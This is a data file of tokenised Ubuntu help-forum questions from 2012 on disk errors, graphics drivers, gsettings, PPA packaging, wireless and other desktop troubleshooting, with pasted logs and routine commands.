155301	i/o errors are reported when i try to install ubuntu , but the smart data is good . is my hard disk dying ?	when i try to install linux , it tells me there is an input output error on dev sda . i have tried both ubuntu and mint on two different computers . so that narrows it down to the hdd . after hours of googling and trying different things i tried making the hardrive ext4 with gparted but that comes up with an error . this makes me think that the hdd is bad . there are a few reasons i think the hdd is n't bad . i can use the hdd in windows fully . windows and gparted disk health checks both say it is fine . its smart data is all good . so ... help ? last week when i checked the smart data was all good . now it is bad . odd . so i now am pretty sure i have a dead hdd . i am posting the smart data here anyways . smartctl 5.41 2011-06-09 r3365 [ i686-linux-3.1.6-pmagic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : seagate barracuda 7200.10 device model : st3160815as serial number : 5rx4pftr firmware version : 3.chf user capacity : 160,041,885,696 bytes [ 160 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 7 ata standard is : exact ata specification draft version not indicated local time is : sun jun 24 17:07:49 2012 utc smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 433 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 52 ) minutes . sct capabilities : ( 0x0035 ) sct status supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 10 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000f 100 253 006 pre-fail always - 0 3 spin_up_time 0x0002 098 096 000 old_age always - 0 4 start_stop_count 0x0033 099 099 020 pre-fail always - 1568 5 reallocated_sector_ct 0x0033 100 100 036 pre-fail always - 0 7 seek_error_rate 0x000f 085 060 030 pre-fail always - 352177338 9 power_on_hours 0x0032 093 093 000 old_age always - 6721 10 spin_retry_count 0x0013 100 100 097 pre-fail always - 0 12 power_cycle_count 0x0033 099 099 020 pre-fail always - 1529 184 end-to-end_error 0x0033 100 253 097 pre-fail always - 0 187 reported_uncorrect 0x003a 001 001 000 old_age always - 13311 189 high_fly_writes 0x0022 096 096 000 old_age always - 4 190 airflow_temperature_cel 0x001a 060 050 000 old_age always - 40 ( min/max 40/42 ) 194 temperature_celsius 0x0000 040 050 000 old_age offline - 40 ( 0 15 0 0 ) 195 hardware_ecc_recovered 0x0032 082 065 000 old_age always - 214888792 197 current_pending_sector 0x0000 100 100 000 old_age offline - 0 198 offline_uncorrectable 0x0000 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0000 200 200 000 old_age offline - 0 smart error log version : 1 ata error count : 13338 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 13338 occurred at disk power-on lifetime : 6713 hours ( 279 days + 17 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 98 9e a1 e0 error : unc at lba = 0x00a19e98 = 10591896 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 25 00 08 98 9e a1 e0 00 00:22:34.027 read dma ext ec 00 00 00 00 00 a0 00 00:22:34.025 identify device ef 03 45 00 00 00 a0 00 00:22:34.010 set features [ set transfer mode ] ec 00 00 00 00 00 a0 00 00:22:43.113 identify device 25 00 08 98 9e a1 e0 00 00:22:43.099 read dma ext error 13337 occurred at disk power-on lifetime : 6713 hours ( 279 days + 17 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 98 9e a1 e0 error : unc at lba = 0x00a19e98 = 10591896 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 25 00 08 98 9e a1 e0 00 00:22:34.027 read dma ext ec 00 00 00 00 00 a0 00 00:22:34.025 identify device ef 03 45 00 00 00 a0 00 00:22:34.010 set features [ set transfer mode ] ec 00 00 00 00 00 a0 00 00:22:34.004 identify device 25 00 08 98 9e a1 e0 00 00:22:31.082 read dma ext error 13336 occurred at disk power-on lifetime : 6713 hours ( 279 days + 17 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 98 9e a1 e0 error : unc at lba = 0x00a19e98 = 10591896 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 25 00 08 98 9e a1 e0 00 00:22:34.027 read dma ext ec 00 00 00 00 00 a0 00 00:22:34.025 identify device ef 03 45 00 00 00 a0 00 00:22:34.010 set features [ set transfer mode ] ec 00 00 00 00 00 a0 00 00:22:34.004 identify device 25 00 08 98 9e a1 e0 00 00:22:31.082 read dma ext error 13335 occurred at disk power-on lifetime : 6713 hours ( 279 days + 17 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 98 9e a1 e0 error : unc at lba = 0x00a19e98 = 10591896 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 25 00 08 98 9e a1 e0 00 00:22:34.027 read dma ext ec 00 00 00 00 00 a0 00 00:22:34.025 identify device ef 03 45 00 00 00 a0 00 00:22:34.010 set features [ set transfer mode ] ec 00 00 00 00 00 a0 00 00:22:34.004 identify device 25 00 08 98 9e a1 e0 00 00:22:31.082 read dma ext error 13334 occurred at disk power-on lifetime : 6713 hours ( 279 days + 17 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 98 9e a1 e0 error : unc at lba = 0x00a19e98 = 10591896 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 25 00 08 98 9e a1 e0 00 00:22:26.624 read dma ext ec 00 00 00 00 00 a0 00 00:22:26.624 identify device ef 03 45 00 00 00 a0 00 00:22:26.623 set features [ set transfer mode ] ec 00 00 00 00 00 a0 00 00:22:26.623 identify device 25 00 08 98 9e a1 e0 00 00:22:31.082 read dma ext smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 short offline completed without error 00 % 0 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
155303	ubuntu graphics card boot issue	i upgraded to ubuntu 12.04 because gimp would n't install on 11.10 . said some conditions were not fulfilled . i upgraded and the graphics went for a toss . i was told by a friend to install the opengl drivers available on the nvidia website . i downloaded it and installed it then ubuntu would not boot properly . ubuntu always freezes up either at the login screen or the desktop . sometimes it just hangs when i open the terminal . i reinstalled 11.10 , again because i was told 12.04 had issues . now 11.10 will not load or has the same issues because of the graphic driver issues , i suppose . now sometimes , on start up after the memory test , the screen just goes black with a blinking cursor on top . and i have no idea what to do with the grub rescue . i am losing valuable time , unable to finish my work . i would appreciate it if someone could sort this out . or atleast help me around with the grub rescue . how do i use that to fix the graphic issues ? my graphics card is a nvidia quadro fx 1500. edit i have not yet installed the graphic drivers . the graphics were a little messed up when i had first installed ubuntu 11.10 but got worse after i updated it to 12.04 . i re-installed 11.10 but the graphics are still as messed up . so much so that i can not even view the desktop if it finally does log me in .
155305	where can i get a list of schema / path / key to use with gsettings ?	after doing some research , i found that i can quickly set configuration options using the gsettings command in the terminal , instead of installing dconf-editor or gconf-editor or ccsm . but we need the schema/path and key to set the value . syntax is : gsettings set schema [ : path ] key value for example to never auto-hide the launcher : gsettings set com.canonical.unity2d.launcher hide-mode 0 and , for windows not to overlap the launcher : gsettings set com.canonical.unity2d.launcher use-strut true so , where can i get a list of all the schema / path / key that can be set with gsettings ? no , please do n't suggest the gsettings list-keys command , because i do n't know the possibly hundreds of schema available .
155310	why do i get a blue screen after interrupting upgrade to 12.04 with a power-off ?	i 've turned off my laptop while the update manager was installing ubuntu 12.04 lts . now when i try to boot into ubuntu the screen is only in blue and i can do nothing execpt to turn it off . is there anyway to reinstall th os using the downloaded files ? thanks !
155318	how do i set up a mail server on a linode vps ?	i have a linode account and trying to setup an email server where i can send and receive email from my registered domain . i typed this into shell : sudo tasksel install mail-server but what is the next step ?
155319	how can i move the panel from the top to the bottom ?	i am coming from windows 8 and want to test new ubuntu 12.xx . how can i change the position of the panel from top to bottom ?
155320	how do i update the firmware on my sony ebook reader ?	i 've a sony ebook reader prs-t1 . i have calibri and there is no problem to put ebooks on the reader , but i do n't know how to update the firmware . perhaps you can help me ? regrets malte
155328	why does 12.04 64-bit installer fail to find root fs and panic ?	i bought a new laptop with a linpus linux bootup . i ca n't install ubuntu 12.04 64-bit . i do n't know why . it says there 's no prefix and then shows a new set of error messages : '' kernel panic - not syncing : vfs unable to mount root fs on unknown-block ( 0,0 ) pid : 1 , comm : swapper/0 not tainted 3.2.0-23-generic # 36-ubuntu '' specs : acer 4755g 2nd gen intel i7 8gb ram
155331	how do i disable online videos in the unity dash ?	recently , i discovered that , unity lenses can access internet to fetch information . such as video lens . but i want to disable that feature , since it is no use to me . can i disable access to internet by unity video lens ? if yes , how ?
155332	why does wine crash when trying to install the vmware vsphere client ?	i 'm trying to install vmware client on my ubuntu with wine but i 'm getting errors during install : wine program crash internal errors invalid parameters received . it seems is a wine issue but i do n't really know how to debug it .
155338	why does wubi fail to boot after removing the ntfs package ?	first of all , i installed ubuntu 12.04 from winxp and booted onto it . i did n't find my ntfs ( later i discovered that it was mounted to /host ) and did 'apt-get install ntfs-3g ntfs-config ' . this turned into conflict as ntfs was already mounted and i decided to remove these packages . now i ca n't boot into ubuntu as 'mount ' fails . what to do ?
155340	how would you unsuspend a computer using a bash script ?	how i can unsuspend my computer with a bash script like : # ! /bin/bash pm-suspend sleep 10m { unsuspend command }
155346	software center not downloading anything ?	it is simply stuck as `` enabling component of distribution '' and `` updating cache '' in the waiting mode ? the download never starts . kind of let down as i was expecting an easier interface . i am downloading vlc media player by the way . additional details- my net speed is fast . at first i thought its because of our restricted network in our campus , ( we do n't have automatic updates through the net cos of some kind of firewall i guess ) ..but downloading and manual updating happens in windows 7 ( dual os in the same system ) ..but its simply stuck in waiting mode in ubuntu ? please help as i am really looking forward to work full time on this platform : (
155347	blank screen after choosing ubuntu at boot option	i had installed 12.04 using live cd on my acer aspire 4736z which has already windows 7 . when it came to the boot screen , which is the grub menu , it shows both os . but , when i choose ubuntu , which was the first choice , my screen just go to blank . my wifi signal light is on . when i choose windows 7 , i can log in and used it but not for ubuntu . i 'm stuck on the blank screen . what could be the problem ? i need someone to guide me on this .
155348	how to keep the app indicator menu visible after clicks ?	i have a specific need in which i want app indicator menu item to respond to mouse click but menu should not disappear , for example when i click play in music menu , menu does not disappear , can i also implement similar thing in indicator menu ? reference : how do i make a rich menu for an appindicator ?
155352	problem graphics with ati radeon x1270 ( rs690m ) on ubuntu 12.04	i 'm italian and so i apologize for my english ! i 'm a beginner to ubuntu and i tried it on my desktop pc and it 's fantastic , fast and fun ! i decided to try it on my netbook packard bell dot m/a and this is the configuration : amd athlon l110 1.2ghz 2gb of ram ati radeon x1270 ( rs690m ) 150gb hard disk i installed ubuntu 12.04 with wubi ( dualboot windows 7 + ubuntu 12.04 ) , because the netbook does not have a dvd player ! during the installation everything is ok , after it was installed i see mistakes in the graphical display ! i see objects that are seen in different colors and moving ( buttons , mouse pointer , text bar ... etc ... ) at one point came not to see anything , such as this screenshot : the drivers are open , that is already installed in ubuntu . windows 7 video card runs fine , can run well aero ( transparent window effects ) , i can watch movies in hd and play some games with the catalyst drivers from amd . now i ask a favor , you can help me solve this problem ? is there a fix for this driver or drivers different on the internet ? thanks for your attention , good bye !
155353	problem installing dropbox	i am having a problem installing dropbox in ubuntu 12.04 files in subdirectories of /var are locked preventing the completion of installation
155355	how can i customize plasma default wallpaper , activity and panel in kubuntu cd ?	so once installed i get directly this desktop : more screenshots i already replaced the default panel , but i do n't know about default activity and find-and-search settings and system settings for transparent theme and system settings for login theme and system settings for default browser and wallpaper .
155360	where does the unity dash get its launchers from ?	i created a launcher for notepad++ ( using wine-launcher-creator ) and moved it into /usr/share/applications and it 's worked , except there are two identical entries in there now . how can i track down where the duplicate is coming from ?
155361	what widget can i use to edit text and highlight parts of it ?	using the quickly ubuntu-application template ( i.e . python and gtk3 ) , what solutions exist to display a text editor in which i can highlight some parts of the text and add annotations/extra visuals at some places ? the idea is to have a component where the user can type in text and as he does so there are some annotations schown ( similar to syntax highlighting ) . the editor does not have to be a rich text editor or anything like an office application , just a text editor would be fine .
155363	xubuntu slow login , unable to go back to login screen . how to debug ?	fresh xubuntu install ( enabling twinview in nvidia 's propietary drivers ) is suddenly taking too long to login after i enter my credentials in the login screen . when i log out ( trying to go back to the login screen ) all i get is a black screen . i do n't know where to start , because i 'm not really sure which program 's guilty of the slowdown . how could i debug this ? this is my xorg.conf ( autogenerated by nvidia x server settings ) , in case it helps : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen 0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` hp w1907 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung '' horizsync 26.0 - 68.0 vertrefresh 24.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 , dfp : nvidia-auto-select +1440+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-2 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` enable '' endsection
155364	internal microphone not working on hp mini	the internal microphone on my hp mini 1001tu does not work with sound recorder or skype .
155368	nvidia ( geforce 2 ) graphics card 3d support	blender and stellarium are n't working for me in ubuntu 12.04 ( precise ) . but blender was working is the previous releases of ubuntu . i think this is because precise 's drivers for my graphics card do n't have 3d support . when i try sudo apt-get install nvidia-96 i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-96 : depends : xorg-video-abi-10 but it is not installable recommends : nvidia-settings but it is not going to be installed e : unable to correct problems , you have held broken packages i did some googling and saw various solutions about downgrading x , adding ppas , etc. , but the problem did n't seem to be solved and i do n't know what to try . how do i get 3d drivers for my card ?
155369	philips semiconductor saa7130 video linux driver	i use ubuntu 11.10 . i need my tv tuner card functioning . using lspci -vnn i figured out that the chip is : 01:00.0 multimedia controller [ 0480 ] : philips semiconductors saa7130 video broadcast decoder [ 1131:7130 ] ( rev 01 ) i tried tvtime . but , it 's all blue screen says ; frames too short from uvcvideo can not open capture device /dev/vidoe0 . can somebody help me please ? i looked through so many threads but as a total newbie i ca n't figure anything . please help me .
155372	is it possible to have music accompany the burg screen on startup ?	i 'm brand new to ubuntu , but i managed to get 12.04 lts up and running on my dell inspiron 15r . afterwards , i wanted a snazzier boot screen , so i installed burg and chose my themes and whatnot . now i want to know if it 's possible to have some music accompany burg screen right after my laptop posts , like , an .mp3 file playing at the same time i 'm choosing my operating system .
155374	make new instance of main window , python gtk	i am fairly new to python and gtk and i am writing an app for the ubuntu app showdown using quickly . i want to make a new instance of the main window when the user clicks on 'new ' . i have the button and menu item linked up , i.e . i can make it make it print 'new ' to the command line when they are clicked . however i have searched and can not find how to make a new instance .
155375	why is update manager non-responsive and why is my wireless off ?	i am new in using linux . the problem i 'm having is with the update manager . i have it pinned to the launcher but when i left-click it does not respond . when i right-click it it responds by showing me the menu but i do n't want to install all the available updates . my laptop is a msi cr630 . i also have a problem with my wlan . it 's saying that it is manually turned of but i tried everything i could think of but let 's face it , i am noob . but i 'm using linux for 2 months now and i do n't want to go back to a cracked windows . if you would like to help me with an answer please be as detailed as you can . thank you !
155383	will installing a program from the software center also include updates from its ppa ?	for example i installed vlc from the ubuntu software center would it also include vlc 's ppa repository so that when my laptop would do a software update , vlc updates would automatically be included for updates ? or should i manually add vlc 's repository via terminal despite installing vlc through the software center ?
155390	quickly user dialog error	i think there is an error in the quickly tutorial . in the user dialog section , the tutorial instructs users to enter : title = saver.title_text in the save dialog method . this gives some error which is fixed by using : title = save.title_text ( )
155391	my wireless is hard-blocked	i 'm new to linux and i am having trouble getting my wireless to work i 've found the following things wireless lan soft blocked : no hard blocked : yes and : *-network disabled description : wireless interface product : rt3090 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 6c:62:6d:19:38 : b9 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.2.0-25-generic-pae firmware=0.34 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : fdfe0000-fdfefff can you please tell me what to do ?
155393	shutter is using big memory	i included shutter on my startup applications list upon installing the app . for the second time in two days , my laptop would suddenly freeze heavily for a few seconds that i ca n't even move the mouse pointer immediately . i had checked my system monitory -- > processes , and to my surprise shutter was using a big chunk of my memory 2.1gb out of my 3.8gb total memory so i had to end the app . kindly note i was not using shutter at the time of the freeze . it seems like including it on my startup applications list is a factor in this problem . is there a way to solve this without having to give it up on startup apps list ? i 'm using 12.04 64-bit on my thinkpad r61i . ( if this would help )
155398	why does n't the delete key move a file to the trash ?	i 'm running ubuntu 12.04 on a macbook pro . i have a file selected in nautilus and i 'd like to move it to the trash . hitting delete takes me back in the history ( like alt+left ) ctrl+delete does nothing right clicking and the `` file '' menu shows `` move to trash '' as an option , but there 's no shortcut key to the right of its entry ( unlike ctrl+c for `` copy '' , etc ) why does n't the delete key do what i expect ?
155402	edit 100mb+ file	i have captured some traffic with wireshark and saved the result as a file . the file has 3 sections now : request headers response headers response body the response body is to become an flv file , but now everything is saved as a single file . so i need a way to delete the first two sections from the file , but the problem is that the file is very big ( over a thousand mega bytes ) . i have tried to open it with gedit , but no matter how long i wait , gedit hangs and remains unresponsive until i kill it . what tool can i use to edit this big file easily ?
155403	unity alert sound stuck on bark	on a fresh install of ubuntu 12.04 , using the unity-2d desktop , i changed the alert sound to a bark and now i ca n't change it back to anything else . in sound settings , under the `` sound effects '' tab , in the `` choose an alert sound '' list , i select `` default '' or `` glass '' or `` sonar '' but i still get barks . i 'm testing by hitting backspace at a terminal prompt in gnome-terminal . can anyone tell me how to get rid of the dog ?
155407	cost of installing and maintaining ubuntu server 12.04	i was wondering if anyone knows how much does a linux support company charge to install ubuntu server edition 12.04 and maintain the server for 1 year in the uk . the server will be inhouse and engineers can login remotely or have to come down to the office for any hardware repairs .
155410	how do i add/create a < source.changes > file ?	i have created a package with quickly and also i have uploaded it to a brach on launchpad , but how can i create a ppa for that program and upload to it ? i 'm really new to these stuff , i just learned how to use bazaar . how do i add/create a < source.changes > file ? jeggy @ jeggy-xps : ~/skriviborð/jebster $ dput ppa : jeggy/jebrowser not a .changes file . please select a .changes file to upload . tried to upload : ppa : jeggy/jebrowser i have added a openpgp key if that helps in anyway . to response to andrewsomething : jeggy @ jeggy-xps : ~/skriviborð/jebster $ quickly share -- ppa ppa : jeggy/jebrowser get launchpad settings launchpad connection is ok gpg : warning : unsafe permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' gpg : warning : unsafe permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' user or team ppa : jeggy not found on launchpad error : share command failed aborting when i run debuild -s -sa i get this jeggy @ jeggy-xps : ~/skriviborð/jebster $ debuild -s -sa dpkg-buildpackage -rfakeroot -d -us -uc -s -sa dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package jebster dpkg-buildpackage : source version 0.1 dpkg-buildpackage : source changed by root < root @ jeggy-xps > dpkg-source -- before-build jebster fakeroot debian/rules clean dh clean -- with python2 , translations dh_testdir dh_auto_clean running clean 'build/lib.linux-x86_64-2.7 ' does not exist -- ca n't clean it 'build/bdist.linux-x86_64 ' does not exist -- ca n't clean it 'build/scripts-2.7 ' does not exist -- ca n't clean it warning : the following files are not recognized by distutilsextra.auto : bin/jebsterc help/c/figures/icon.png help/c/index.page help/c/preferences.page help/c/topic1.page jebster.desktop.in po/jebster.pot dh_clean dpkg-source -b jebster dpkg-source : warning : no source format specified in debian/source/format , see dpkg-source ( 1 ) dpkg-source : warning : source directory 'jebster ' is not < sourcepackage > - < upstreamversion > 'jebster-0.1' dpkg-source : info : using source format `1.0' dpkg-source : info : building jebster in jebster_0.1.tar.gz dpkg-source : info : building jebster in jebster_0.1.dsc dpkg-genchanges -s -sa > ../jebster_0.1_source.changes dpkg-genchanges : including full source code in upload dpkg-source -- after-build jebster dpkg-buildpackage : source only upload : debian-native package now running lintian ... e : jebster changes : changed-by-address-malformed root < root @ jeggy-xps > w : jebster source : diff-contains-bzr-control-dir .bzr w : jebster source : unused-build-dependency-on-cdbs w : jebster source : package-needs-versioned-debhelper-build-depends 8 w : jebster source : ancient-standards-version 3.8.3 ( current is 3.9.3 ) finished running lintian . now signing changes and any dsc files ... signfile jebster_0.1.dsc root < root @ jeggy-xps > gpg : warning : unsafe enclosing directory permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' gpg : skipped `` root < root @ jeggy-xps > '' : secret key not available gpg : /tmp/debsign.bdtfrcql/jebster_0.1.dsc : clearsign failed : secret key not available debsign : gpg error occurred ! aborting ... . debuild : fatal error at line 1271 : running debsign failed . jeggy @ jeggy-xps : ~/skriviborð/jebster/debian $ cat changelog jebster ( 0.1 ) precise ; urgency=low [ jógvan olsen ] * initial release . [ root ] -- root < root @ jeggy-xps > mon , 25 jun 2012 14:53:00 +0100 jeggy @ jeggy-xps : ~/skriviborð/jebster/debian $ gpg -- list-keys gpg : warning : unsafe enclosing directory permissions on configuration file `/home/jeggy/.gnupg/gpg.conf' /home/jeggy/.gnupg/pubring.gpg -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- pub 2048r/1c17b342 2012-03-10 uid ubuntu accomplishments < jono @ ubuntu.com > sub 2048r/6305aa1f 2012-03-10 sub 2048d/05164e07 2012-03-10 pub 1024r/2868f9c3 2012-06-23 uid jógvan olsen < jeggy @ jebster.net > pub 2048r/5c24b331 2012-06-24 uid jógvan olsen < jeggy @ jebster.net > sub 2048r/162f6987 2012-06-24 pub 2048r/2b4f8fe7 2012-06-26 uid jogvan olsen < jeggy @ jebster.net > sub 2048r/9cf57e08 2012-06-26
155413	how to reset monitor display settings ?	on ubuntu 12.04 laptop with gnome desktop , i tried to set an additional display through catalyst ( administrative ) and slowly ended up making making a mess out of the whole thing . i tried several combinations of settings and at each iterration i just made things worse , ending up with 'mail battery sound time user power ' icons repeating on the top bar . now i 'm lost as to how to restore everything to default settings .
155415	imon rm200 remote ( device 15c2 : ffdc ) wo n't work on ubuntu 12.04 or 11.10	the device is recognized just fine : bus 001 device 005 : id 15c2 : ffdc soundgraph inc. imon pad remote controller found /sys/class/rc/rc0/ ( /dev/input/event6 ) with : driver imon , table rc-imon-mce supported protocols : rc-6 enabled protocols : rc-6 repeat delay = 500 ms , repeat period = 125 ms but any testing results in nothing . i point the remote , i press a few button and nothing happens . not in irw , not in ir-keytable , nothing . it 's driving me insane .
155416	how can i enable audio system on envy 15t-3200	i just received my hp envy 15 ( june 2012 model ) and i can not get my audio system to fully function . this laptop has 6 speakers . 1 . ) 2 speakers on the front of the laptop ( stereo ) . 2 . ) 2 speakers above the keyboard , just before the lcd hinges . 3 . ) 2 subwoofer speakers underneath the battery cover facing downward . only the 2 speakers in the front are working . this is a `` beats '' audio system . there have been many beats audio laptops before this one , so maybe if someone has experience with those , it might translate to this device .
155419	really weird situation with swap that refuses to work	so i decide to move my swap partition to another hdd to make hibernation more fast , i create a partition with a liveusb , do swapon , and then hibernate just disappears i go into the terminal , reactivate hibernate ( so the button shows ) for some reason the swap was n't `` on '' so i do swapon again . still not working . i go back to the terminal and edit the file with the uuid of the new swap partition . the partition shows as swap on gparted , it 's on , the file has the right uuid , even the task manager shows a swap area of 10gb , and there is a hibernate button on the shutdown window . edit : it 's even using the swap for vm , 7.4 % to be precise . but it-wont-hibernate ! what 's going on ?
155423	how to sync a folder to ubuntu one cloud via command line ?	i 'm writing a shell script to back up my databases and send that backups to my ubuntu one cloud . basically , it dumps the databases into a sql file named after current date , putting it in a folder under /var/backups . i need to make this folder /var/backups/whatever syncronizable to ubuntu one , and make it sync every time a new file is posted there , all by commandline . how can i do these ?
155424	changing tty keyboard layout on a server ?	i use 12.04 server in command line mode ( no x installed ) , and i would like to change the keyboard layout . how can i do this ?
155428	ca n't find my dvd drive in ubuntu 12.04	i am completely new to linux , due to some problems in my windows i decided to give linux a try . i am quite liking it accept for some minor issues . the biggest of them is that i can not find my dvd drive in ubuntu . after i insert the disk , the drive 's green light flickers and then nothing . i do n't get anything on my unity bar or desktop . there is no folder inside my /dev folder which indicates a dvd drive . there is a cdrom folder in my root folder but nothing is there . if you guys know what 's wrong , i 'd appreciate the help . am a complete newbie so do n't expect me to know anything about ubuntu , although i have spent lots of hours in last 2 days googling my issue so i have basic information ...
155432	skype 4 does not shows icon in the panel	i installed skype 4 in ubuntu and now it does not show its icon in the top panel like it did : http : //i.imgur.com/xjzvf.png this is how it looks now : http : //i.imgur.com/ytqwd.jpg is there a way to enable skype icon in the panel ?
